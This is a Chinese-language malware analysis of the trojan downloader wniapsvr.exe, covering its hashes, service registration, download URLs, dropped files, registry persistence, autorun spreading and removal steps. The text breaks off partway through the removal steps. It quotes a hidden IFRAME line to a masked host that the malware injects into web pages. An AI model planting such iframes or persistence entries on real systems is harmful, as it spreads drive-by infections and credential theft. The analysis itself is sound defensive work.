木马下载者wniapsvr.exe来了

分析:
File: wniapsvr.exe
Size: 24333 bytes
File Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
MD5: E73C5073E03673880C62683BA24DB798
SHA1: 7A2496CBBD05F3B01D35C1DDC4A12E93D171DD9A
CRC32: 18621B7D

病毒运行后:
文件变化:
释放文件
C:\WINDOWS\system32\wniapsvr.exe

注册服务Visual VSA WEB

服务相关键值
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Type: 0x00000110
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Start: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ImagePath: "C:\WINDOWS\system32\wniapsvr.exe -Run"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\DisplayName: "Networ VSA"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Description: "允许对TCP/IP上NetBios服务以及NetBT名称解析的支持。"

删除C:\WINDOWS\system32\verclsid.exe

启动IE连接网络 222.88.91.80:80下载木马
下载http://web.xxxxxxxxxx.com/web/123.txt到%programfiles%下面
读取里面的木马版本信息
下载木马
http://web.xxxxxxxxxx.com/soft/1.exe
http://web.xxxxxxxxxx.com/soft/2.exe
http://web.xxxxxxxxxx.com/soft/3.exe
http://web.xxxxxxxxxx.com/soft/4.exe
http://web.xxxxxxxxxx.com/soft/5.exe
http://web.xxxxxxxxxx.com/soft/6.exe
http://web.xxxxxxxxxx.com/soft/7.exe
http://web.xxxxxxxxxx.com/soft/8.exe
http://web.xxxxxxxxxx.com/soft/9.exe
http://web.xxxxxxxxxx.com/soft/a.exe
http://web.xxxxxxxxxx.com/soft/b.exe
http://web.xxxxxxxxxx.com/soft/c.exe
http://web.xxxxxxxxxx.com/soft/d.exe
http://web.xxxxxxxxxx.com/soft/e.exe
http://web.xxxxxxxxxx.com/soft/f.exe
http://web.xxxxxxxxxx.com/soft/g.exe
到%program files%下面 分别命名为pro1.exe~pro16.exe

木马植入完毕后
生成如下文件
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\dhapri.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\netsrvcs.dll
C:\WINDOWS\system32\nslookupi.exe
C:\WINDOWS\system32\ntsokele.exe
C:\WINDOWS\system32\nwizwmgjs.exe
C:\WINDOWS\system32\perefic.ini
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\system32\wniapsvr.exe
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\MsIMMs32.exe
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\upxdnd.exe
C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
C:\WINDOWS\system32\dhapri.dll

所有分区下生成hide.exe和autorun.inf E盘下面还生成sysauto.exe
sysauto.exe跟C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys有关 是盗号木马

hide.exe与C:\WINDOWS\system32\RemoteDbg.dll有关

值得一提的是C:\WINDOWS\system32\nslookupi.exe这个病毒
他感染所有分区的htm html asp 等网页文件
在其中加入<IFRAME SRC=http://mm.xxxxxx.com/abc.htm width=1 height=1 frameborder=0></IFRAME>的代码

sreng日志中相关项目如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><dhapri.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{12311A42-AC1B-158F-FD32-5674345F23A1}><C:\WINDOWS\system32\dhapri.dll> []
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys> []
服务
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
<C:\WINDOWS\system32\ntsokele.exe><N/A>
[Networ VSA / Visual VSA WEB][Stopped/Auto Start]
<C:\WINDOWS\system32\wniapsvr.exe -Run><Microsoft Corporation>
进程
[PID: 1748 / Administrator][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\dhapri.dll] [N/A, ]
[C:\Program Files\Internet Explorer\PLUGINS\System64.Sys] [N/A, ]
[C:\WINDOWS\system32\upxdnd.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
[C:\WINDOWS\system32\AVPSrv.dll] [N/A, ]
[C:\WINDOWS\system32\MsIMMs32.dll] [N/A, ]
[C:\WINDOWS\system32\TIMHost.dll] [N/A, ]
[C:\WINDOWS\system32\nwizwmgjs.dll] [N/A, ]

清除方法:
首先把C:\WINDOWS\system32\dhapri.dll重命名为其他名称
然后重启进入安全模式下
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出